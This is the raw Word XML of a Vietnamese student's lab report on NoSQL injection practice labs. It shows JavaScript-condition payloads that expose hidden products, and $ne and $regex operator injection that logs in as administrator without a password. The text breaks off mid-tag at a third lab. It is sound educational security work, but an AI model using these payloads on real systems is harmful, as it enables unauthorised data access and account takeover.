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FDE9DD" w14:textId="1E1877BC" w:rsidR="0037576B" w:rsidRDefault="00657B40" w:rsidP="00EA4348">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BÁO CÁO NOSQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53267904" w14:textId="0663C906" w:rsidR="00EA4348" w:rsidRPr="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00EA4348">
      <w:r w:rsidRPr="00EA4348">
        <w:t>Sinh viên thực hiện: Lê Đức Việt - 23162113</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8DF81" w14:textId="36C76433" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab 1: Detecting NoSQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29CE46" w14:textId="339F9BB1" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:r w:rsidRPr="00657B40">
        <w:t>To solve the lab, perform a NoSQL injection attack that causes the application to display unreleased products</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0929AE0A" w14:textId="76E8CF22" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:r>
        <w:t>Mới đầu ta cứ bấm vào 1 thư mục nào đó bất kỳ thì ta được kết quả trả về đúng, hệ thống không có lỗi nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B55F2F" w14:textId="4C185F8A" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E161A8E" wp14:editId="2E66C674">
            <wp:extent cx="5128260" cy="20403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48647" cy="2048457"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5396674B" w14:textId="3BBEBF17" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FB59B91" wp14:editId="71B61B24">
            <wp:extent cx="4328160" cy="29381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34432" cy="2942413"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2A1A6C" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="7BEBAD60" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="55249281" w14:textId="398E2823" w:rsidR="00657B40" w:rsidRPr="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tiến hành chèn dấu nháy đơn vào url, sau tên thư mục như hình bên dưới, thì ta quan sát trang web trả về lỗi 500 lỗi hệ thống có thể là </w:t>
      </w:r>
      <w:r w:rsidRPr="00657B40">
        <w:t>JavaScript syntax error.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00657B40">
        <w:t>Câu lệnh gốc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> có thể là </w:t>
      </w:r>
      <w:r w:rsidRPr="00657B40">
        <w:t xml:space="preserve">this.category == </w:t>
      </w:r>
      <w:r>
        <w:t>‘Accessories’ k</w:t>
      </w:r>
      <w:r w:rsidRPr="00657B40">
        <w:t xml:space="preserve">hi </w:t>
      </w:r>
      <w:r>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00657B40">
        <w:t xml:space="preserve"> chèn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thêm </w:t>
      </w:r>
      <w:r w:rsidRPr="00657B40">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘ thì thành </w:t>
      </w:r>
      <w:r w:rsidRPr="00657B40">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00657B40">
        <w:t xml:space="preserve">this.category == </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘ Accessories’’. </w:t>
      </w:r>
      <w:r w:rsidRPr="00657B40">
        <w:t xml:space="preserve">Thừa một dấu nháy đơn làm cho cú pháp JavaScript bị hỏng, khiến Server không thực thi được và trả về lỗi. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A71BA9" w14:textId="52111092" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73B59CA2" wp14:editId="183903BC">
            <wp:extent cx="5943600" cy="22123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212340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65230410" w14:textId="295AB65B" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18129967" wp14:editId="1C93BDD1">
            <wp:extent cx="3627434" cy="18289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27434" cy="1828958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4D7A8E" w14:textId="62479856" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:r>
        <w:t>Tiếp theo thử nối chuỗi thêm ‘+’ vào sau url</w:t>
      </w:r>
      <w:r w:rsidR="001F086D">
        <w:t xml:space="preserve"> thì ta nhận được kết quả vẫn trả về danh mục Accessories, điều này có nghĩa là </w:t>
      </w:r>
      <w:r w:rsidR="001F086D" w:rsidRPr="001F086D">
        <w:t>Server có thực thi phép toán của JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="001F086D">
        <w:t xml:space="preserve">  ‘Accessories’+’’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E9D61" w14:textId="6AE98964" w:rsidR="00657B40" w:rsidRDefault="001F086D" w:rsidP="00657B40">
      <w:r w:rsidRPr="001F086D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C48BE03" wp14:editId="7B107C62">
            <wp:extent cx="5943600" cy="18319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831975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D8AB0" w14:textId="6FAA0F55" w:rsidR="00657B40" w:rsidRDefault="001F086D" w:rsidP="00657B40">
      <w:r w:rsidRPr="001F086D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A1B3493" wp14:editId="30BCDF9E">
            <wp:extent cx="5837426" cy="58679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37426" cy="5867908"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="602877A7" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="417AE81D" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="39FC442A" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="4769E10B" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="308CE64E" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="3818DC6C" w14:textId="198FAA99" w:rsidR="001F086D" w:rsidRDefault="001F086D" w:rsidP="00657B40">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tiếp theo chèn thử 1 điều kiện sai và url Accessories’&amp;&amp;0&amp;&amp;’x’==’x</w:t>
      </w:r>
      <w:r w:rsidR="006766AD">
        <w:t>, ta nhận được kết quả hệ thống vẫn chạy bình thường nhưng ta không nhận được sản phẩm nào cả, d</w:t>
      </w:r>
      <w:r w:rsidR="006766AD" w:rsidRPr="006766AD">
        <w:t xml:space="preserve">o điều kiện tổng là </w:t>
      </w:r>
      <w:r w:rsidR="006766AD">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006766AD" w:rsidRPr="006766AD">
        <w:t xml:space="preserve">ai, </w:t>
      </w:r>
      <w:r w:rsidR="006766AD">
        <w:t xml:space="preserve">hệ thống </w:t>
      </w:r>
      <w:r w:rsidR="006766AD" w:rsidRPr="006766AD">
        <w:t>không tìm thấy bản ghi nào khớp, dẫn đến trang trống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DAA4A8" w14:textId="43DDE420" w:rsidR="001F086D" w:rsidRDefault="001F086D" w:rsidP="00657B40">
      <w:r w:rsidRPr="001F086D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32858A79" wp14:editId="062A529E">
            <wp:extent cx="5943600" cy="174371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743710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DDA6A4" w14:textId="0355D9DD" w:rsidR="006766AD" w:rsidRDefault="006766AD" w:rsidP="00657B40">
      <w:r w:rsidRPr="006766AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F93B227" wp14:editId="3157C8FC">
            <wp:extent cx="5943600" cy="2952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952750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E5E780" w14:textId="3EEF167B" w:rsidR="006766AD" w:rsidRDefault="006766AD" w:rsidP="00657B40">
      <w:r>
        <w:t xml:space="preserve">Tiếp theo chèn 1 điều kiện luôn đúng </w:t>
      </w:r>
      <w:r w:rsidRPr="006766AD">
        <w:t>&amp;&amp; 1 &amp;&amp; 'x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thì ta nhận được kết quả trả về các sản phẩm thuộc Accessories bình thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B257234" w14:textId="2F07F54A" w:rsidR="006766AD" w:rsidRDefault="006766AD" w:rsidP="00657B40">
      <w:r w:rsidRPr="006766AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F59E488" wp14:editId="061004CB">
            <wp:extent cx="5943600" cy="14484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448435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DAD820" w14:textId="4D3B3B9B" w:rsidR="006766AD" w:rsidRDefault="006766AD" w:rsidP="00657B40">
      <w:r w:rsidRPr="006766AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="746A8D8F" wp14:editId="156904E8">
            <wp:extent cx="5943600" cy="49739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973955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147D0E5" w14:textId="4D58D22E" w:rsidR="006766AD" w:rsidRPr="006766AD" w:rsidRDefault="006766AD" w:rsidP="006766AD">
      <w:r>
        <w:t xml:space="preserve">Cuối cùng thử payload điều kiện luôn đúng </w:t>
      </w:r>
      <w:r w:rsidRPr="006766AD">
        <w:t>' || 1 || '</w:t>
      </w:r>
      <w:r>
        <w:t>, lúc này kết quả ta nhận được là tất cả các sản phẩm mà hệ thống có, t</w:t>
      </w:r>
      <w:r w:rsidRPr="006766AD">
        <w:t>rong phép toán OR, chỉ cần một vế là 1 thì cả dòng lệnh đó sẽ luôn luôn Đúng, bất kể danh mục sản phẩm là gì.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006766AD">
        <w:t>Database bị đánh lừa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r w:rsidRPr="006766AD">
        <w:t xml:space="preserve">ó không còn lọc theo danh mục nữa mà  cho phép mọi </w:t>
      </w:r>
      <w:r>
        <w:t>sản phẩm</w:t>
      </w:r>
      <w:r w:rsidRPr="006766AD">
        <w:t xml:space="preserve"> trong bộ sưu tập sản phẩm được trả về.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7101D5E7" w14:textId="7B25B02A" w:rsidR="006766AD" w:rsidRDefault="006766AD" w:rsidP="00657B40"/>
    <w:p w14:paraId="4A42854F" w14:textId="0434CA1F" w:rsidR="006766AD" w:rsidRDefault="006766AD" w:rsidP="00657B40">
      <w:r w:rsidRPr="006766AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783AB989" wp14:editId="4A0B0BBF">
            <wp:extent cx="5943600" cy="16078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607820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC6FE2F" w14:textId="3612304F" w:rsidR="006766AD" w:rsidRDefault="006766AD" w:rsidP="00657B40">
      <w:r w:rsidRPr="006766AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A1EFE11" wp14:editId="25E31B59">
            <wp:extent cx="5943600" cy="407352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073525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB27E4" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="1F902CAF" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="4F2BA592" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="1CD698E5" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="7117F753" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="7DF0AD26" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="5D3F2EAD" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRPr="00657B40" w:rsidRDefault="00EA4348" w:rsidP="00657B40"/>
    <w:p w14:paraId="3EFBE471" w14:textId="7216E3AB" w:rsidR="00E446C8" w:rsidRPr="00E446C8" w:rsidRDefault="00657B40" w:rsidP="00E446C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lab 2: </w:t>
      </w:r>
      <w:r w:rsidR="00E446C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> E</w:t>
      </w:r>
      <w:r w:rsidR="00E446C8" w:rsidRPr="00E446C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xploiting NoSQL operator injection to bypass authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433B5667" w14:textId="068F30FE" w:rsidR="00657B40" w:rsidRPr="00E446C8" w:rsidRDefault="00E446C8" w:rsidP="00E446C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E446C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To solve the lab, log into the application as the administrator user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056FD2A6" w14:textId="2F241E4B" w:rsidR="002B76B4" w:rsidRPr="002B76B4" w:rsidRDefault="002B76B4" w:rsidP="002B76B4">
      <w:r w:rsidRPr="002B76B4">
        <w:t>Tiến hành đăng nhập và bắt được gói tin đăng nhập như bên dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EC7B52" w14:textId="1628D570" w:rsidR="002B76B4" w:rsidRDefault="002B76B4" w:rsidP="002B76B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B76B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3790F524" wp14:editId="39E1FA11">
            <wp:extent cx="5943600" cy="34315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431540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D0D3CD" w14:textId="345FD56B" w:rsidR="002B76B4" w:rsidRDefault="002B76B4" w:rsidP="002B76B4">
      <w:r w:rsidRPr="002B76B4">
        <w:t>Ta biết có 1 tài khoản là wiener:peter nên tiến hành test thử toán tử $ne</w:t>
      </w:r>
      <w:r w:rsidR="005D03D1">
        <w:t xml:space="preserve"> thì ta quan sát được kết quả đã đăng nhập vào được account </w:t>
      </w:r>
      <w:r w:rsidR="005D03D1" w:rsidRPr="005D03D1">
        <w:t>wiener</w:t>
      </w:r>
      <w:r w:rsidR="005D03D1">
        <w:t xml:space="preserve"> mà ta không cần biết đến tên đăng nhập của nó. </w:t>
      </w:r>
      <w:r w:rsidR="005D03D1" w:rsidRPr="005D03D1">
        <w:t>Database tìm người dùng có tên</w:t>
      </w:r>
      <w:r w:rsidR="005D03D1">
        <w:t xml:space="preserve"> khác rỗng</w:t>
      </w:r>
      <w:r w:rsidR="005D03D1" w:rsidRPr="005D03D1">
        <w:t xml:space="preserve"> và pass là peter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698CF321" w14:textId="5B3BA88B" w:rsidR="005D03D1" w:rsidRDefault="005D03D1" w:rsidP="002B76B4">
      <w:r w:rsidRPr="005D03D1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC6AA2A" wp14:editId="267B175A">
            <wp:extent cx="4282811" cy="1752752"/>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82811" cy="1752752"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B8AEDE" w14:textId="26193C98" w:rsidR="002B76B4" w:rsidRDefault="005D03D1" w:rsidP="002B76B4">
      <w:r w:rsidRPr="005D03D1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="313662A5" wp14:editId="2BAF70BB">
            <wp:extent cx="5943600" cy="376809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768090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E6AA9F" w14:textId="32FECF55" w:rsidR="005D03D1" w:rsidRDefault="005D03D1" w:rsidP="002B76B4">
      <w:r>
        <w:t>Tiếp theo t</w:t>
      </w:r>
      <w:r w:rsidRPr="005D03D1">
        <w:t>hử nghiệm toán tử $regex</w:t>
      </w:r>
      <w:r w:rsidR="008C477A">
        <w:t>, thì ta cũng nhận được kết quả tương tự là đã đăng nhập vào được account của wiener với toán tử regex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A44A43" w14:textId="1B53677B" w:rsidR="005D03D1" w:rsidRDefault="008C477A" w:rsidP="002B76B4">
      <w:r w:rsidRPr="008C477A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69B58CC8" wp14:editId="74E6D036">
            <wp:extent cx="4000847" cy="20804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00847" cy="2080440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F90DBD" w14:textId="6B90D935" w:rsidR="008C477A" w:rsidRDefault="008C477A" w:rsidP="002B76B4">
      <w:r w:rsidRPr="005D03D1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE9C662" wp14:editId="2186B703">
            <wp:extent cx="5943600" cy="376809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768090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AFB41E" w14:textId="47EEBDB3" w:rsidR="008C477A" w:rsidRDefault="008C477A" w:rsidP="002B76B4">
      <w:r>
        <w:t xml:space="preserve">Tiếp theo ta tiến hành thử đăng nhập với tư cách là admin dùng regex để đăng nhập với tài khoản mà bắt đầu bằng admin, thì ta nhận được kết quả là có tài khoản bắt đầu bằng admin </w:t>
      </w:r>
      <w:r w:rsidRPr="008C477A">
        <w:t>adminde2h68p6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và ta đã đăng nhập thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAF2AA" w14:textId="5CE64482" w:rsidR="008C477A" w:rsidRDefault="008C477A" w:rsidP="002B76B4">
      <w:r w:rsidRPr="008C477A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DF2039" wp14:editId="72E3DAE2">
            <wp:extent cx="4153260" cy="152413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53260" cy="1524132"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BD7FBE" w14:textId="0F23441D" w:rsidR="008C477A" w:rsidRDefault="008C477A" w:rsidP="002B76B4">
      <w:r w:rsidRPr="008C477A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68378B8D" wp14:editId="35F18FB8">
            <wp:extent cx="5441152" cy="2126164"/>
            <wp:effectExtent l="0" t="0" r="762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41152" cy="2126164"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19352D2E" w14:textId="20C5EE59" w:rsidR="008C477A" w:rsidRDefault="008C477A" w:rsidP="002B76B4">
      <w:r>
        <w:t xml:space="preserve">Bây giờ tiến hành đăng nhập với tên chính xác của admin </w:t>
      </w:r>
      <w:r w:rsidRPr="008C477A">
        <w:t>administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thì lúc này ta đã đăng nhập được vào với tư cách là administrator mà không cần biết mật khẩu là dẫy ký tự nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641F9C61" w14:textId="03EC4D0B" w:rsidR="008C477A" w:rsidRDefault="008C477A" w:rsidP="002B76B4">
      <w:r w:rsidRPr="008C477A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B543F4B" wp14:editId="0A0CDEBD">
            <wp:extent cx="3482642" cy="792549"/>
            <wp:effectExtent l="0" t="0" r="381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82642" cy="792549"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A0275" w14:textId="372387F2" w:rsidR="008C477A" w:rsidRPr="002B76B4" w:rsidRDefault="008C477A" w:rsidP="002B76B4">
      <w:r w:rsidRPr="008C477A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79AB7809" wp14:editId="4228ED47">
            <wp:extent cx="5082980" cy="3086367"/>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82980" cy="3086367"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A08E14" w14:textId="77777777" w:rsidR="00E446C8" w:rsidRPr="00E446C8" w:rsidRDefault="00657B40" w:rsidP="00E446C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
